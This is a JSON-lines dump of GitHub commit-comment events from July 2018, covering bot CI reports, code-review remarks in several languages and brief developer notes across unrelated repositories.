{"id":"7987132408","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759709,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T06:32:10Z","updated_at":"2018-07-19T06:32:10Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T06:32:10Z"}
{"id":"7987136477","type":"CommitCommentEvent","actor":{"login":"GeneMosher"},"repo":{"name":"ViewTouch/viewtouch"},"payload":{"comment":{"id":29759721,"position":null,"line":null,"path":null,"commit_id":"288f29e4e60ef35689d7749f8e0e505cd1df2e06","created_at":"2018-07-19T06:33:22Z","updated_at":"2018-07-19T06:33:22Z","author_association":"MEMBER","body":"Good catch, R!"}},"created_at":"2018-07-19T06:33:22Z"}
{"id":"7987140395","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759730,"position":42,"line":42,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:34:30Z","updated_at":"2018-07-19T06:34:30Z","author_association":"NONE","body":"Объекты говорят между собой методами. Когда ты добавляешь что-то в аксэсор, то эта вещь становится доступна в публичном интерфэйсе класса. Грубо говоря, я запустив твою программу и создав поезд, могу написать train.carriages_amount = \"привет\". После чего программа будет работать не корректно. Это нарушение инкапсуляции. Не стоит давать внешнему коду доступа к деталям реализации класса. Используй публичные методы "}},"created_at":"2018-07-19T06:34:30Z"}
{"id":"7987145785","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759739,"position":42,"line":42,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:36:00Z","updated_at":"2018-07-19T06:36:00Z","author_association":"NONE","body":"И эти методы :current_station, :previous_station, :next_station правильней вычислять из route каждый раз. Нужно написать для них отдельные методы"}},"created_at":"2018-07-19T06:36:00Z"}
{"id":"7987148291","type":"CommitCommentEvent","actor":{"login":"tmaul1968"},"repo":{"name":"tmaul1968/I-am-testing"},"payload":{"comment":{"id":29759744,"position":null,"line":null,"path":null,"commit_id":"bce0a2cbbccf3185ef4d27ec214b7a05c0eac718","created_at":"2018-07-19T06:36:44Z","updated_at":"2018-07-19T06:36:44Z","author_association":"OWNER","body":"just a comment"}},"created_at":"2018-07-19T06:36:44Z"}
{"id":"7987149532","type":"CommitCommentEvent","actor":{"login":"srujinunna"},"repo":{"name":"srujinunna/devops-code"},"payload":{"comment":{"id":29759750,"position":null,"line":null,"path":null,"commit_id":"8065cba9e6f12f2386f8bdf98a91209a4a459b79","created_at":"2018-07-19T06:37:05Z","updated_at":"2018-07-19T06:37:05Z","author_association":"OWNER","body":"new info"}},"created_at":"2018-07-19T06:37:05Z"}
{"id":"7987150219","type":"CommitCommentEvent","actor":{"login":"srujinunna"},"repo":{"name":"srujinunna/devops-code"},"payload":{"comment":{"id":29759756,"position":null,"line":null,"path":null,"commit_id":"8065cba9e6f12f2386f8bdf98a91209a4a459b79","created_at":"2018-07-19T06:37:16Z","updated_at":"2018-07-19T06:37:16Z","author_association":"OWNER","body":"new info added"}},"created_at":"2018-07-19T06:37:16Z"}
{"id":"7987150675","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759759,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T06:37:23Z","updated_at":"2018-07-19T06:37:23Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T06:37:23Z"}
{"id":"7987150747","type":"CommitCommentEvent","actor":{"login":"kshitiz20"},"repo":{"name":"kshitiz20/Whack-a-mole"},"payload":{"comment":{"id":29759760,"position":null,"line":null,"path":null,"commit_id":"0615da68801b0f7ef8776bfc81dc1dd315afe9ba","created_at":"2018-07-19T06:37:24Z","updated_at":"2018-07-19T06:37:24Z","author_association":"OWNER","body":"Resolved the game over issue"}},"created_at":"2018-07-19T06:37:24Z"}
{"id":"7987153564","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29759767,"position":null,"line":null,"path":null,"commit_id":"6c47c245b476c8ec6d19734f1b5c5bcc52ebd624","created_at":"2018-07-19T06:38:13Z","updated_at":"2018-07-19T06:38:13Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/6c47c245b476c8ec6d19734f1b5c5bcc52ebd624#commitcomment-29758908) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/ecb490632d6ad806e381d3048cb6ec46bbf35af2/daily_2018_7_19/report.md). cc @ararslan"}},"created_at":"2018-07-19T06:38:13Z"}
{"id":"7987154014","type":"CommitCommentEvent","actor":{"login":"Hechengneng"},"repo":{"name":"Hechengneng/hello-world"},"payload":{"comment":{"id":29759769,"position":null,"line":null,"path":null,"commit_id":"fdfdea921c25c4ced2f1c7fc580fd1cd5097bdc5","created_at":"2018-07-19T06:38:20Z","updated_at":"2018-07-19T06:38:20Z","author_association":"OWNER","body":"Hi Hechengneng,hanppy everyday"}},"created_at":"2018-07-19T06:38:20Z"}
{"id":"7987154865","type":"CommitCommentEvent","actor":{"login":"spillai14"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":29759770,"position":34,"line":67,"path":"docs/troubleshooting/member_startup_problems.md","commit_id":"7eba81733deb9b6862b99f20918b75eeb490af3d","created_at":"2018-07-19T06:38:34Z","updated_at":"2018-07-19T06:38:34Z","author_association":"CONTRIBUTOR","body":"Restarting the cluster after changing the order is one of the solutions and the other solution is to use the list-missing-diskstore and unblock -diskstore utilities."}},"created_at":"2018-07-19T06:38:34Z"}
{"id":"7987158204","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759776,"position":53,"line":53,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:39:28Z","updated_at":"2018-07-19T06:39:28Z","author_association":"NONE","body":"согласно ТЗ:\r\n\r\n\"Может набирать скорость\"\r\n\"Может тормозить (сбрасывать скорость до нуля)\"\r\nодин метод только для набора скорости, другой - для торможения и дать соответствующие названия."}},"created_at":"2018-07-19T06:39:28Z"}
{"id":"7987166080","type":"CommitCommentEvent","actor":{"login":"s-yadav"},"repo":{"name":"s-yadav/react-number-format"},"payload":{"comment":{"id":29759789,"position":53,"line":53,"path":"typings/number_format.d.ts","commit_id":"70e1a070209bb012c84aa32b2fee644445f5d082","created_at":"2018-07-19T06:41:40Z","updated_at":"2018-07-19T06:41:40Z","author_association":"OWNER","body":"Wouldn't it changes the api of NumberFormat? Not sure how the types of class is defined on different file and exported in typescript. I will read about it."}},"created_at":"2018-07-19T06:41:40Z"}
{"id":"7987166550","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29759790,"position":4,"line":184,"path":"Zend/zend_execute_API.c","commit_id":"3b6e1ee4ee05678b5d717cd926a35ffdc1335929","created_at":"2018-07-19T06:41:48Z","updated_at":"2018-07-19T06:41:48Z","author_association":"CONTRIBUTOR","body":"Fixed. Thanks."}},"created_at":"2018-07-19T06:41:48Z"}
{"id":"7987168980","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759804,"position":56,"line":56,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:42:29Z","updated_at":"2018-07-19T06:42:29Z","author_association":"NONE","body":"мы рекомендуем пользоваться @ вместо self когда перезаписываем значение инстэнс переменной. Так понятней, что не вызывается метод,а просто меняется значение"}},"created_at":"2018-07-19T06:42:29Z"}
{"id":"7987170471","type":"CommitCommentEvent","actor":{"login":"danielmessi13"},"repo":{"name":"vikvik98/ProjetoEventos"},"payload":{"comment":{"id":29759816,"position":null,"line":null,"path":null,"commit_id":"0973e5d3b385a278853b36867cf52efc9032a676","created_at":"2018-07-19T06:42:54Z","updated_at":"2018-07-19T06:42:54Z","author_association":"COLLABORATOR","body":"Não foi eu, foi o Filipe\r\n"}},"created_at":"2018-07-19T06:42:54Z"}
{"id":"7987175870","type":"CommitCommentEvent","actor":{"login":"chicababe"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29759825,"position":null,"line":null,"path":null,"commit_id":"3799f4da6260581f77090513a54274e8c6af5aff","created_at":"2018-07-19T06:44:27Z","updated_at":"2018-07-19T06:44:27Z","author_association":"NONE","body":"can you update iro:Restart packet tables and keys thank you"}},"created_at":"2018-07-19T06:44:27Z"}
{"id":"7987177170","type":"CommitCommentEvent","actor":{"login":"zhaohanyang"},"repo":{"name":"zhaohanyang/JWTDemo"},"payload":{"comment":{"id":29759827,"position":110,"line":110,"path":"README.md","commit_id":"a1d673dd0bcdb65bd60c07c8c00bddce83d87354","created_at":"2018-07-19T06:44:50Z","updated_at":"2018-07-19T06:44:50Z","author_association":"OWNER","body":"main方法运行结果如下:\r\neyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJKV1TkuLvpopgiLCJuYW1lIjoiRGFuaWVsIiwiaWQiOjI4OTM0MSwiZXhwIjoxNTMyODQ2NDcwLCJpYXQiOjE1MzE5ODI0NzB9.jsaqrAZIv3NIN3DMvZ_6aYDFiG0u7R8YCxDWO42QBoE\r\nJWT主题"}},"created_at":"2018-07-19T06:44:50Z"}
{"id":"7987177930","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"CocoaPods/CocoaPods-app"},"payload":{"comment":{"id":29759830,"position":null,"line":null,"path":null,"commit_id":"84864d83714d7d00e61607d512aaf3d0ce562441","created_at":"2018-07-19T06:45:02Z","updated_at":"2018-07-19T06:45:02Z","author_association":"NONE","body":"84864d8"}},"created_at":"2018-07-19T06:45:02Z"}
{"id":"7987181362","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759843,"position":66,"line":66,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:45:58Z","updated_at":"2018-07-19T06:45:58Z","author_association":"NONE","body":"Этот метод появился из-за того, что теперь нужно поддерживать 3 инстанс переменные. На самом деле вместо этого тебе тут нужно сообщить станции, что к ней пришел поезд"}},"created_at":"2018-07-19T06:45:58Z"}
{"id":"7987181822","type":"CommitCommentEvent","actor":{"login":"cdl08001"},"repo":{"name":"hrsf99-Expressel/expressel-item-gallery-service"},"payload":{"comment":{"id":29759845,"position":null,"line":null,"path":null,"commit_id":"812f42d14699d05832ce20bd2e51921ee78c45de","created_at":"2018-07-19T06:46:05Z","updated_at":"2018-07-19T06:46:05Z","author_association":"CONTRIBUTOR","body":"@katie-truong @courtchao @shripriyaprabhakar Hey Team! If anyone has a chance to take a look at this, i'd appreciate it!"}},"created_at":"2018-07-19T06:46:05Z"}
{"id":"7987184550","type":"CommitCommentEvent","actor":{"login":"TyroSpy"},"repo":{"name":"crdroidandroid/android_frameworks_base"},"payload":{"comment":{"id":29759858,"position":null,"line":null,"path":null,"commit_id":"8a595f8cc9fcef1f45671f2608b7aa903d6681dd","created_at":"2018-07-19T06:46:46Z","updated_at":"2018-07-19T06:46:46Z","author_association":"NONE","body":"On line number 130 the slash is skipped"}},"created_at":"2018-07-19T06:46:46Z"}
{"id":"7987188394","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759865,"position":15,"line":91,"path":"__tests__/actions/payment.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:47:44Z","updated_at":"2018-07-19T06:47:44Z","author_association":"MEMBER","body":"The second parameter to `generatePayment` is wrong"}},"created_at":"2018-07-19T06:47:44Z"}
{"id":"7987189074","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29759867,"position":70,"line":70,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T06:47:54Z","updated_at":"2018-07-19T06:47:54Z","author_association":"NONE","body":"В руби все кроме nil и false воспринимается как правдивые значения. Это можно использовать в условиях\r\n```\r\n# вместо\r\nunless next_station.nil?\r\n  do this\r\n# можно\r\nunless next_station\r\n``` "}},"created_at":"2018-07-19T06:47:54Z"}
{"id":"7987191172","type":"CommitCommentEvent","actor":{"login":"siddharthkp"},"repo":{"name":"auth0/cosmos"},"payload":{"comment":{"id":29759873,"position":null,"line":null,"path":null,"commit_id":"d40c52909382114994f3a83ee1a199b17ac22aec","created_at":"2018-07-19T06:48:28Z","updated_at":"2018-07-19T06:48:28Z","author_association":"COLLABORATOR","body":"Pushed to master by default!"}},"created_at":"2018-07-19T06:48:28Z"}
{"id":"7987192513","type":"CommitCommentEvent","actor":{"login":"taterhead1977"},"repo":{"name":"shrikanth7698/Smart-Mirror-App"},"payload":{"comment":{"id":29759876,"position":null,"line":null,"path":null,"commit_id":"30bd703fc9de193d0175665ba16d8bcf0022f152","created_at":"2018-07-19T06:48:49Z","updated_at":"2018-07-19T06:48:49Z","author_association":"NONE","body":"How do I apply this application to my phone\r\n"}},"created_at":"2018-07-19T06:48:49Z"}
{"id":"7987192638","type":"CommitCommentEvent","actor":{"login":"ag93999"},"repo":{"name":"civilmachines/drf-account"},"payload":{"comment":{"id":29759877,"position":null,"line":null,"path":null,"commit_id":"2bcf5ff0304fc243f4ebfc832213234888f767c1","created_at":"2018-07-19T06:48:51Z","updated_at":"2018-07-19T06:48:51Z","author_association":"MEMBER","body":"closed #1 \r\nclosed #2 "}},"created_at":"2018-07-19T06:48:51Z"}
{"id":"7987195893","type":"CommitCommentEvent","actor":{"login":"jsfaint"},"repo":{"name":"fatih/vim-go"},"payload":{"comment":{"id":29759888,"position":4,"line":10,"path":"autoload/go/job.vim","commit_id":"ec2e5a84d9ea05c27e8b00865d46ca2c2f7bf8ec","created_at":"2018-07-19T06:49:45Z","updated_at":"2018-07-19T06:49:45Z","author_association":"CONTRIBUTOR","body":"There are two go#job#Spawn() function in the autoload/go/job.vim now with same code.\r\nhttps://github.com/fatih/vim-go/blob/master/autoload/go/job.vim#L4"}},"created_at":"2018-07-19T06:49:45Z"}
{"id":"7987197472","type":"CommitCommentEvent","actor":{"login":"arestarh"},"repo":{"name":"arestarh/ansible"},"payload":{"comment":{"id":29759891,"position":null,"line":null,"path":null,"commit_id":"ce8ed2f61fab2e1f975c4e9ddff58366c8bb2c7f","created_at":"2018-07-19T06:50:11Z","updated_at":"2018-07-19T06:50:11Z","author_association":"OWNER","body":"3. win_iis_webhandler.ps1 to create web handler (\"Module Mapping\" in IIS Manager) in IIS."}},"created_at":"2018-07-19T06:50:11Z"}
{"id":"7987197683","type":"CommitCommentEvent","actor":{"login":"browncrane"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29759892,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-19T06:50:14Z","updated_at":"2018-07-19T06:50:14Z","author_association":"CONTRIBUTOR","body":"Is it possible we change the example? So that the slave can't be shut down without close the app?"}},"created_at":"2018-07-19T06:50:14Z"}
{"id":"7987197897","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759893,"position":64,"line":70,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:50:17Z","updated_at":"2018-07-19T06:50:17Z","author_association":"MEMBER","body":"it's better to explicitly specify it's single payment"}},"created_at":"2018-07-19T06:50:17Z"}
{"id":"7987202903","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759901,"position":83,"line":84,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:51:35Z","updated_at":"2018-07-19T06:51:35Z","author_association":"MEMBER","body":"should be boolean, not string"}},"created_at":"2018-07-19T06:51:35Z"}
{"id":"7987203382","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29759903,"position":null,"line":null,"path":null,"commit_id":"9c57968c4ab7eeffd7f89302a3fa61a5acdc9b2a","created_at":"2018-07-19T06:51:43Z","updated_at":"2018-07-19T06:51:43Z","author_association":"OWNER","body":"Also added lower-bound check on remove_item, and upgraded the record/replay system:\r\n\r\n* A recording is now automatically made in /tmp/mogue3replay\r\n* Multiple record/replay arguments now properly close previous file streams\r\n* Replays now save erosion and offset parameters\r\n* Signal handling now ensures that replays will be saved properly even in the event of a segfault.\r\n\r\nI am pleased that I have realized that the record/replay system can help fix bugs, in addition to being a lazy save/load system. If a segfault happens, I can figure it out from a core dump, fix it, and make sure that it's fixed by replaying the game back exactly as it happened."}},"created_at":"2018-07-19T06:51:43Z"}
{"id":"7987203910","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759905,"position":103,"line":98,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:51:51Z","updated_at":"2018-07-19T06:51:51Z","author_association":"MEMBER","body":"boolean"}},"created_at":"2018-07-19T06:51:51Z"}
{"id":"7987206483","type":"CommitCommentEvent","actor":{"login":"AllenLeong"},"repo":{"name":"injetlee/Python"},"payload":{"comment":{"id":29759909,"position":6,"line":7,"path":"ModifyFilename.py","commit_id":"18419910fd97f22e319db27428a900340c8a5232","created_at":"2018-07-19T06:52:32Z","updated_at":"2018-07-19T06:52:32Z","author_association":"NONE","body":"dlsjfaijdfof\r\n"}},"created_at":"2018-07-19T06:52:32Z"}
{"id":"7987210393","type":"CommitCommentEvent","actor":{"login":"eunicode"},"repo":{"name":"eunicode/gatsby-tut-2"},"payload":{"comment":{"id":29759919,"position":null,"line":null,"path":null,"commit_id":"24ab459aaea2abeaef0469f525cf4f56466504eb","created_at":"2018-07-19T06:53:35Z","updated_at":"2018-07-19T06:53:35Z","author_association":"OWNER","body":"Had problems installing Typography.js plugin, but updating Gatsby resolved issues.\r\nSolution found here: https://github.com/gatsbyjs/gatsby/issues/2246"}},"created_at":"2018-07-19T06:53:35Z"}
{"id":"7987211322","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759920,"position":122,"line":113,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:53:52Z","updated_at":"2018-07-19T06:53:52Z","author_association":"MEMBER","body":"Boolean"}},"created_at":"2018-07-19T06:53:52Z"}
{"id":"7987211682","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759921,"position":141,"line":128,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:53:58Z","updated_at":"2018-07-19T06:53:58Z","author_association":"MEMBER","body":"Boolean"}},"created_at":"2018-07-19T06:53:58Z"}
{"id":"7987211916","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29759922,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-19T06:54:02Z","updated_at":"2018-07-19T06:54:02Z","author_association":"MEMBER","body":"Cleanup dm7020hdv2 tested and OK :)."}},"created_at":"2018-07-19T06:54:02Z"}
{"id":"7987212553","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759924,"position":159,"line":143,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:54:11Z","updated_at":"2018-07-19T06:54:11Z","author_association":"MEMBER","body":"Boolean"}},"created_at":"2018-07-19T06:54:11Z"}
{"id":"7987214607","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759933,"position":175,"line":156,"path":"__tests__/classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:54:43Z","updated_at":"2018-07-19T06:54:43Z","author_association":"MEMBER","body":"Boolean"}},"created_at":"2018-07-19T06:54:43Z"}
{"id":"7987214834","type":"CommitCommentEvent","actor":{"login":"yanghui11922"},"repo":{"name":"yanghui11922/tableGenerator"},"payload":{"comment":{"id":29759935,"position":null,"line":null,"path":null,"commit_id":"6f4046bba4a662b478073f70775bd3a4668c7eed","created_at":"2018-07-19T06:54:47Z","updated_at":"2018-07-19T06:54:47Z","author_association":"OWNER","body":"用于只判断一条记录"}},"created_at":"2018-07-19T06:54:47Z"}
{"id":"7987216371","type":"CommitCommentEvent","actor":{"login":"huanghuikang"},"repo":{"name":"huanghuikang/Hello-World"},"payload":{"comment":{"id":29759937,"position":null,"line":null,"path":null,"commit_id":"f21582d273577867d6487efc988f7478af978f34","created_at":"2018-07-19T06:55:11Z","updated_at":"2018-07-19T06:55:11Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-19T06:55:11Z"}
{"id":"7987219556","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759949,"position":6,"line":85,"path":"__tests__/classes/importTool.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:56:01Z","updated_at":"2018-07-19T06:56:01Z","author_association":"MEMBER","body":"better use `model.tableName`"}},"created_at":"2018-07-19T06:56:01Z"}
{"id":"7987219909","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TalarSadalla/StarterKitChess"},"payload":{"comment":{"id":29759950,"position":8,"line":257,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/BoardManager.java","commit_id":"4c87f04bdb066b71d89ff4b0a07f151f711e7fe6","created_at":"2018-07-19T06:56:07Z","updated_at":"2018-07-19T06:56:07Z","author_association":"NONE","body":"ta metoda powinna byc w bord.class"}},"created_at":"2018-07-19T06:56:07Z"}
{"id":"7987222046","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759954,"position":5,"line":27,"path":"__tests__/models/payment.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:56:39Z","updated_at":"2018-07-19T06:56:39Z","author_association":"MEMBER","body":"no need for empty object parameter"}},"created_at":"2018-07-19T06:56:39Z"}
{"id":"7987223582","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"siteshwar/ast"},"payload":{"comment":{"id":29759956,"position":17,"line":63,"path":".travis.yml","commit_id":"bc9572a8535c3454bee7d7375c9594d41a593f47","created_at":"2018-07-19T06:57:05Z","updated_at":"2018-07-19T06:57:05Z","author_association":"NONE","body":"This is the wrong way to do this. Even assuming we did agree incorporating `csbuild` is desirable the csbuild specific bits (i.e., the `sudo...` portion)  should be embedded in the *scripts/build-on-docker.sh* script rather than this config file. In no small part because if we did make this standard behavior the other Linux test environments should leverage it without having to do anything other than add the `SCAN_TYPE=csbuild` var. And, not too surprisingly, incorporating `csbuild` breaks the build because it apparently does not play well with Meson. Too, I don't see how it can add value without significant cost in the context of the Travis CI environment. Which, given we are using it without recompense, seems rather uncivil.\r\n\r\n@kdudka wrote:\r\n\r\n> You can configure csbuild to invoke full build just once and then rebuild only files changed by the commits in question.\r\n\r\nThat is not true for using it in Travis AFAICT as it requires remembering build state between invocations. Which is definitely not true for our Travis CI use.\r\n\r\n@siteshwar, I understand that you need to be sensitive to the demands made by your boss. But incorporating `csbuild` into this project, outside of Red Hat's internal build system, seems to add far more cost than benefit."}},"created_at":"2018-07-19T06:57:05Z"}
{"id":"7987225864","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759959,"position":12,"line":46,"path":"classes/ImportTool.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:57:43Z","updated_at":"2018-07-19T06:57:43Z","author_association":"MEMBER","body":"this is a good place to explain why you don't check multi-column indexes"}},"created_at":"2018-07-19T06:57:43Z"}
{"id":"7987226086","type":"CommitCommentEvent","actor":{"login":"jpc"},"repo":{"name":"LoEE/lua-cjson"},"payload":{"comment":{"id":29759960,"position":null,"line":null,"path":null,"commit_id":"c723836c21b406fdfd44cb801bddd82d5e43d238","created_at":"2018-07-19T06:57:47Z","updated_at":"2018-07-19T06:57:47Z","author_association":"MEMBER","body":"Fixed in 8a12f7ccb817afabd55b1d86686fb058a9cbaab3. Thanks."}},"created_at":"2018-07-19T06:57:47Z"}
{"id":"7987230305","type":"CommitCommentEvent","actor":{"login":"maiquynhtruong"},"repo":{"name":"maiquynhtruong/compilers"},"payload":{"comment":{"id":29759968,"position":16,"line":31,"path":"code_gen/codegen.ll","commit_id":"1f43358a180df1470cc7bcc84546ba7e06e8e4c0","created_at":"2018-07-19T06:58:54Z","updated_at":"2018-07-19T06:58:54Z","author_association":"OWNER","body":"lol where is this coming from?"}},"created_at":"2018-07-19T06:58:54Z"}
{"id":"7987230988","type":"CommitCommentEvent","actor":{"login":"groupsky"},"repo":{"name":"BspbOrg/members-server"},"payload":{"comment":{"id":29759969,"position":28,"line":22,"path":"classes/PaymentPreprocessor.js","commit_id":"2765808fcbd269494e77733daf959b7d34984540","created_at":"2018-07-19T06:59:05Z","updated_at":"2018-07-19T06:59:05Z","author_association":"MEMBER","body":"`isBefore || isSameDay === !isAfter`"}},"created_at":"2018-07-19T06:59:05Z"}
{"id":"7987231364","type":"CommitCommentEvent","actor":{"login":"maiquynhtruong"},"repo":{"name":"maiquynhtruong/compilers"},"payload":{"comment":{"id":29759970,"position":24,"line":187,"path":"code_gen/parser.c","commit_id":"1f43358a180df1470cc7bcc84546ba7e06e8e4c0","created_at":"2018-07-19T06:59:11Z","updated_at":"2018-07-19T06:59:11Z","author_association":"OWNER","body":"It's here lol"}},"created_at":"2018-07-19T06:59:11Z"}
{"id":"7987251792","type":"CommitCommentEvent","actor":{"login":"gouthambudda"},"repo":{"name":"gouthambudda/eatrev"},"payload":{"comment":{"id":29760012,"position":null,"line":null,"path":null,"commit_id":"d619beaca6139d1c12626a555b48a2780172c6f9","created_at":"2018-07-19T07:04:16Z","updated_at":"2018-07-19T07:04:16Z","author_association":"OWNER","body":"www.eatrev.com"}},"created_at":"2018-07-19T07:04:16Z"}
{"id":"7987259998","type":"CommitCommentEvent","actor":{"login":"Euseong"},"repo":{"name":"Euseong/R-project"},"payload":{"comment":{"id":29760027,"position":5,"line":4,"path":"linear_regression.R","commit_id":"f2f2f8260b00b8b7270d2c483e4ab8b83442b518","created_at":"2018-07-19T07:06:17Z","updated_at":"2018-07-19T07:06:17Z","author_association":"OWNER","body":"pairs.panels 함수 불러올 패키지 명시"}},"created_at":"2018-07-19T07:06:17Z"}
